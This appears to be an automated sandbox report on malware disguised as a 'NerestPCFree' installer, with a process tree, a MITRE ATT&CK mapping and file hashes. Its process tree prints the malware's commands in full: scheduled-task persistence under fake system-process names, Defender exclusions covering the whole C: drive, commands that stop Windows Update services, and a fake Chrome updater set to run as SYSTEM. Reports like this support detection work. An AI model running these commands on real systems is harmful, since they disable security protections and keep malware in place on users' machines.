C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\WmiPrvSE.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1748
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\WmiPrvSE.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1860
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\WmiPrvSE.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2368
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Windows\ShellNew\smss.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2752
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\ShellNew\smss.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2924
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\ShellNew\smss.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1164
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\audiodg.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:424
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1752
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2080
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\smss.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1772
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\smss.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1564
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\smss.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2260
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Windows\security\services.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2656
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\security\services.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1140
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Windows\security\services.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2512
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 5 /tr "'C:\fontwin\MsServerHost.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2276
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2364
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 9 /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2236
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:684
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
- Indicator Removal: Clear Windows Event Logs
PID:752
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:808
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1168
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\system32\taskeng.exetaskeng.exe {D6F7DE9C-44A2-4460-BAC8-6EFAF9F8DFE6} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
PID:292 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:1496
-
-
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:988
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:964
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:112
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1020
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1060
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1100
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:836
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2448
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2056
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:496
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:504
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe"C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\fontwin\rjeG9jpaqkoGYbXQiCixJVHPtViWeFHmB5.vbe"4⤵
- System Location Discovery: System Language Discovery
PID:2780 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\fontwin\SCfgtLybPKjlpPh39WWFnP7oUkboktfnsRDnMjyFOdFfzldEyFoe.bat" "5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1876 -
C:\fontwin\MsServerHost.exe"C:\fontwin/MsServerHost.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
PID:3040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yuqn5vbi\yuqn5vbi.cmdline"7⤵
- Drops file in System32 directory
PID:2812 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES162F.tmp" "c:\Windows\System32\CSC7D2F785B976C42AAA316FD7FCBF052.TMP"8⤵PID:1820
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\WmiPrvSE.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellNew\smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\audiodg.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\security\services.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1972
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jKkZYzVQ86.bat"7⤵PID:2572
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:2804
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1712
-
-
C:\Windows\ShellNew\smss.exe"C:\Windows\ShellNew\smss.exe"8⤵
- Executes dropped EXE
PID:2156
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\twain32.exe"C:\Users\Admin\AppData\Local\Temp\twain32.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1536
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2972
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3060
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2476
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2852
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:556
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1604
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2340
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1344
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2240
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2552
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2896
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:596
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1936
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:1612 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:1472
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:668
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:2560
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:1292
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:2988 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2080
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2544
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Modifies data under HKEY_USERS
PID:1252
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1221055517-2055351782-1614951340127003608512537440141364892741-213209618-1511003925"1⤵PID:2960
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12877538551741513258186840011-18980561041552295991-1851439976119204996-808245150"1⤵PID:2708
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2280248081599670161-4343298021211491651-13160984759117423621851624753-1834149440"1⤵PID:2804
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "835523354-569751979784133578-113343149-1126385063870397016-1899975981-1320380874"1⤵PID:900
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-576777164366393762779214399748602657166111699813106459201173452456-666023283"1⤵PID:2768
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2103982051-1801922608-16175857331568465300-915912905755678840264412723-1830903136"1⤵PID:1608
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "10218160038322182391695975732-20390870221547766196-3331441591361976274585719027"1⤵PID:2180
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1239396195-292214100-454327888-1649475064213913645414500482541752700988-1597111423"1⤵
- Suspicious use of SetWindowsHookEx
PID:2856
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-7075722531161000719-82764004-2638859007135210721029075461577017711154112323"1⤵PID:472
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "4254076642142352329-2059788238975856282-650389535-16245161831744626369795119788"1⤵PID:3036
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5529469832001375000-1967454336-900338911-2031445917-11640724591753841771-1690655872"1⤵PID:3048
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "15254807391762701935717718781681309016548904411-2070369658-2379999121853867008"1⤵PID:1424
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5300316512327390671423387919-1115260302-1001528772099008581779508663-1916071747"1⤵PID:2284
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "166255556936998823211796972-677799809910178573-743648069998253000-1933472010"1⤵PID:3044
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-140614829511758518511371297343468391883-201018098341853986-1328543991-1843117274"1⤵PID:2744
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1449395085525815516-95749627-803988440-139133198-182056308-1251743404267976837"1⤵PID:2520
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-5799938921689700574-1708673886-423465928-1689122428-2067055528-1567484141922916916"1⤵PID:988
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "293758439-1847813849-5154985171268627019-416699558-12584129651141116441855938459"1⤵PID:2364
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-870525574-124751479-1615527090-2053111270-46508427414226483101845688663-1709857480"1⤵PID:1940
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-18747285511813282931205373788018886816671512109253-9689879205307529461997099780"1⤵PID:1488
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-118212457461466326811933757023672942334501035281643427800737735335-132580235"1⤵PID:2664
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "802052171-428321671-1402624478-59831651191409702653328793800052080395487509"1⤵PID:1852
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-972142147-1299365973-8324774791067520330-964933243-1522200409-20754035031328399634"1⤵PID:2924
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1666110230117897485781372551206867964817998584295288985354748177261381872544"1⤵PID:2512
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-538203700-1082106027-11076830941189196763-19387696825571742021356134668-1238929929"1⤵PID:1268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "12392308401096181692-458595492-1438931791986032141291546788187999239742813746"1⤵PID:2468
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-234883349-1810990454-2125757256-1451308057-938294716193499366942492266-1851115633"1⤵PID:2796
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-990304876-1552565589341423264804908162-605570241-1447417684-831540551-2020156767"1⤵
- Suspicious use of SetWindowsHookEx
PID:1512
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a924317a1450bbcb00063ffa6d39343c
SHA1ab398208544399713e35e7a3c3ff5fb541e8178a
SHA2568c4577a243ad8171c51dbd1315f6558f468e0e9d04dbb04d995be74e01c7371d
SHA512f897b4d80dd1a0aa58c7ea35cda47603e249fff3e8c4addd947e13a774b7aa840142e3c11f7384d5e195160be2292c2286af3197b761dbcfbc0d146fcde9dc69
-
Filesize
156B
MD5a30b6c1b984899fd1c4ad7eaecd0003e
SHA1983a32e3e2c6fa35acaccd7aad531fd198458bec
SHA25647f2c3e88f61dbeff6933837956e47234b4d4eaad1b25d2f8e3d387712e908cc
SHA512389148af72c59611acf0f6660581116cbaf099f9c27acbf4fd5ff264511017c2748cf693afa2c5bb28ebf17c0465abf28eefa514ac6be13317786220b7c17e54
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d2671ba08b977c3b89f8f3a61344891c
SHA112c5c70eb792a39f94baa608d2986c00e32ae0e3
SHA256ae8e4b1f7b55fcc3b158b50c802ef41dca4b6a3935171eb1cb72847390903da3
SHA512e9dfbb4763bd3827542df79a9dff5dbf373051477388f96411fe79e828f973c835ebb963df98f5b5f96c75eed3b95498c358ea60d1d0ae1091b81f8aa47dcca3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD50b8ab07c584b7388ccd84b08c59ac564
SHA18f66cb157dd5148c6f42bc88054ebf27e2f28b2a
SHA256d68d43576640675822812b0c1c7a66c3ea8f2a0b071e1d61497c13656a284c5e
SHA51290166d39677cccd26ca6e27540ea024f198c88bdac1b131793472c6789f949622b2b92a07cdb51d3e93f5b9da4be3708d29e8e4d1958deb6ad4cd8f82272a0b5
-
Filesize
3KB
MD51ce9b896804736500e1759d62716265e
SHA11b4eef95c4b70debc5f45f2e92d73246c249ca3b
SHA256868ec01e0d846666099f529a392714fb4d9eb63bd32b3cb1cda5b9b07e08a62c
SHA5120d4d7a7ed74b6eaa581848b7c55f1901701401f8c0f0398c142d2abe0329ef6499063bd8e9eb46f2939d10c903a1747d1fd0509e3067d499c174fed61a90ebf4
-
Filesize
3KB
MD5879de7b6905fdec6cc51e90281f62f83
SHA1fcd1e3fe5de1222feee2dfcc12f3855822e4b121
SHA256acf273898880f7fd6a579fac217933d15dc525a9dce5f68c5544a8d924a6b910
SHA512e51a3ccabf1df80db5a0269c341eed9438f4774e061f91ff74f6a0ed84322e1fe9f32110bd1c451d918845c3b6df048a6884dd3d9fc2f3837f6ef3b51bd42a55
-
Filesize
3KB
MD59eef140b23f8f36b92157e0f6f654fba
SHA14f31a9edb04521e09b7b916847b171660604dc80
SHA256dc31b182f56a63c166ad991251730055f5f3fe914d8761c1d46f3fb40ba57fde
SHA5126192f1150545876ebae8b0baf9cfa89bebd20b3561a14fb904cbe30ca02d07e80f2a3da02eb907422b539c6ae02bbe953188235d05b1e9bb6ec461048a78fe25
-
Filesize
145KB
MD519c7052de3b7281b4c1c6bfbb543c5dc
SHA1d2e12081a14c1069c89f2cee7357a559c27786e7
SHA25614ed6cb3198e80964cbc687a60aed24fb68d1bbd7588f983dc1fc6ae63514b4a
